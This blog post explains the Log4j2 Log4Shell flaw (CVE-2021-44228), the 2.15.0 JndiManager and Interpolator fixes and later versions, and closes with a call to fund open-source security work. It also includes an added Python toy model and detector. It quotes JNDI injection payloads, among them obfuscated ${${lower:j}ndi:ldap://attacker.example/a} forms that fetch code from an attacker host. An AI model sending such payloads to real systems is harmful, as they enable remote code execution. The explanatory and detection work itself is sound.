Notes on Apache Log4j2 issue, fix, lessons learned and next steps

  • what caused the security issue in Apache Log4j2
  • fix provided by the Apache team for this issue
  • lessons learned
  • how we can all help Open Source in locating and fixing these kinds of security issues

About the issue

Log4j2 expands lookups of the form ${prefix:key} inside the strings it processes (string interpolation), and one of the bundled lookups is jndi. In Log4j2 2.0-beta9 through 2.14.1 this expansion was also applied to the log message itself, so a message containing ${jndi:ldap://<attacker host>/a} made the logger perform a JNDI lookup against an LDAP server the attacker chose. Log messages routinely contain attacker-controlled input (User-Agent headers, usernames, form fields), so any such input that reaches a log call could trigger the lookup.

Arbitrary code loaded from LDAP servers: the LDAP response can point the JVM at a remote Java class (a JNDI reference with a codebase), which the JVM then downloads and instantiates, giving the attacker remote code execution inside the logging process. This is CVE-2021-44228 ("Log4Shell"). Even where the JDK refuses to load classes from a remote codebase, the response can carry a serialized object or a reference that a class already on the classpath will deserialize or resolve, so disabling remote codebase loading alone is not a fix.

Log4j2 String interpolation issue: the root cause is that lookups ran on untrusted message text at all. Lookups also nest, so ${${lower:j}ndi:...} or ${j${::-n}di:...} resolve to the same jndi lookup; matching the literal text "${jndi:" in requests or logs therefore misses trivially obfuscated payloads.

Fix Details

Fix in JndiManager.java (version 2.15.0): JNDI lookups are no longer open-ended. Before contacting anything, the manager checks the lookup target against allowlists: only the java, ldap and ldaps protocols are accepted, LDAP and LDAPS lookups may only go to allowlisted hosts (by default the local host), and an object returned by LDAP is only accepted if its class is on an allowlist of plain Java types; a result that carries a remote codebase or serialized data is rejected. A lookup such as ${jndi:ldap://<attacker host>/a} therefore no longer fetches and instantiates a class from the attacker's server.

Fix in Interpolator.java: the interpolator no longer depends on JndiLookup.class at compile time; it loads the JNDI lookup by name at runtime and continues without it, with a warning, when the class is absent (reference 2). This keeps the widely used stop-gap of deleting org/apache/logging/log4j/core/lookup/JndiLookup.class from log4j-core-*.jar working on deployments that cannot upgrade immediately. In the same release, lookups stopped being applied to the formatted log message by default (on 2.10 through 2.14.1 this had to be requested with log4j2.formatMsgNoLookups=true); they still apply to the logging configuration.

Caveat: 2.15.0 was later found to be incomplete (CVE-2021-45046), because certain non-default configurations still let attacker-controlled input reach the JNDI lookup. 2.16.0 removed message lookups entirely and disabled JNDI by default, and further fixes followed; treat 2.17.1 or later as the upgrade target and use the delete-the-class mitigation only as a temporary measure.
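The following is an added example (not Log4j code and not from the original post) that models the behaviour described in the two sections above: a small ${prefix:key} interpolator in the style of Log4j2's StrSubstitutor, a stand-in JndiManager that records lookups instead of contacting a server, the two 2.15.0-style fixes (message lookups off, allowlisted JNDI targets), and a detector that canonicalises nested lookups before searching for jndi. The host attacker.example, the log lines and the allowlist contents are constructed for the example; the allowlists approximate the 2.15.0 defaults rather than reproduce them.

```python
"""Toy model of Log4j2 lookup interpolation (CVE-2021-44228) and the 2.15.0-style fixes.
Added example; not Log4j code. Hosts, allowlists and log lines below are constructed."""
import re
from urllib.parse import urlsplit

MAX_DEPTH = 32  # guard against runaway recursion from self-referential lookups

def _matching_brace(text, start):
    """Index of the '}' closing the '${' at `start`, honouring nesting; -1 if unbalanced."""
    depth, i = 0, start
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            i += 2
            continue
        if text[i] == "}":
            depth -= 1
            if depth == 0:
                return i
        i += 1
    return -1

def _evaluate(body, lookups):
    """Evaluate one 'prefix:key' or 'prefix:key:-default' body. None means unresolved."""
    var, has_default, default = body.partition(":-")
    prefix, sep, key = var.partition(":")
    fn = lookups.get(prefix.lower()) if sep else None
    value = fn(key) if fn else None
    if value is None and has_default:
        value = default
    return value

def resolve_lookups(text, lookups, depth=0):
    """Expand ${...} innermost-first; unresolvable lookups stay literal, as in StrSubstitutor."""
    if depth > MAX_DEPTH:
        raise ValueError("lookup nesting too deep")
    out, i = [], 0
    while i < len(text):
        if text.startswith("${", i):
            j = _matching_brace(text, i)
            if j < 0:                      # unbalanced: keep the rest verbatim
                out.append(text[i:])
                break
            inner = resolve_lookups(text[i + 2:j], lookups, depth + 1)
            value = _evaluate(inner, lookups)
            out.append(value if value is not None else "${" + inner + "}")
            i = j + 1
        else:
            out.append(text[i])
            i += 1
    return "".join(out)

# Pure string lookups that attackers use to hide "jndi" from naive pattern matching.
OBFUSCATION_LOOKUPS = {"lower": str.lower, "upper": str.upper}

# Illustrative stand-ins for the 2.15.0 JndiManager allowlists (assumed values, not Log4j's).
ALLOWED_PROTOCOLS = {"java", "ldap", "ldaps"}
ALLOWED_HOSTS = {"localhost", "127.0.0.1", "::1"}

def jndi_target_allowed(name):
    """2.15.0-style check: only allowlisted protocols, and LDAP only to allowlisted hosts."""
    u = urlsplit(name)
    if u.scheme not in ALLOWED_PROTOCOLS:
        return False
    if u.scheme in ("ldap", "ldaps") and (u.hostname or "") not in ALLOWED_HOSTS:
        return False
    return True

class FakeJndi:
    """Stand-in for JndiManager: records the target instead of contacting a server."""
    def __init__(self, restricted):
        self.restricted = restricted   # False = pre-2.15.0 behaviour, True = allowlisted
        self.attempts = []
    def lookup(self, name):
        self.attempts.append(name)
        if self.restricted and not jndi_target_allowed(name):
            return None                # rejected: the lookup resolves to nothing
        return "<object fetched from " + name + ">"

def log_message(message, jndi, message_lookups=True):
    """message_lookups=True mimics <= 2.14.1 (lookups run on the message itself);
    False mimics the 2.15.0 default, or log4j2.formatMsgNoLookups=true on 2.10-2.14.1."""
    lookups = dict(OBFUSCATION_LOOKUPS, jndi=jndi.lookup)
    return resolve_lookups(message, lookups) if message_lookups else message

def contains_jndi_lookup(line):
    """Detection: canonicalise the obfuscation-only lookups, then look for a jndi lookup."""
    canonical = resolve_lookups(line, OBFUSCATION_LOOKUPS)
    return re.search(r"\$\{\s*jndi\s*:", canonical, re.IGNORECASE) is not None

if __name__ == "__main__":
    payload = "${${lower:j}ndi:ldap://attacker.example/a}"   # constructed; placeholder host
    vulnerable = FakeJndi(restricted=False)
    print(log_message("User-Agent: " + payload, vulnerable), vulnerable.attempts)
    fixed = FakeJndi(restricted=True)
    print(log_message("User-Agent: " + payload, fixed, message_lookups=False), fixed.attempts)
    print(contains_jndi_lookup("${j${::-n}di:ldap://attacker.example/a}"))
```

Running the script shows the three states side by side: with message lookups on and no allowlist the payload causes a lookup against attacker.example and its result lands in the log line; with message lookups off the text is logged verbatim and no lookup happens; and the detector still flags the payload after the ${lower:j} and ${::-n} tricks have been folded away, which a plain search for "${jndi:" would not.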

Lessons Learned

  • A voluntary movement to find these kinds of issues in our Open Source software.
  • These volunteers should be rewarded for their work in locating and fixing these kinds of issues, similar to Prof. Donald Knuth's reward checks for reported errors.
  • Users of Open Source software can fund these efforts. This will make our Open Source more successful; as we know, Open Source is the backbone of the growth of our software industry.
  • Let us make it healthier and stronger!

References

  1. CVE-2021-44228
  2. Remove static dependency on JndiLookup.class
  3. Koushik from Java Brains explains the issue in detail

Improving Agriculture, Healthcare… Equality for All, Love and Respect Nature. https://mohan-chinnappan-n.github.io/about/cv.html
Mohan Chinnappan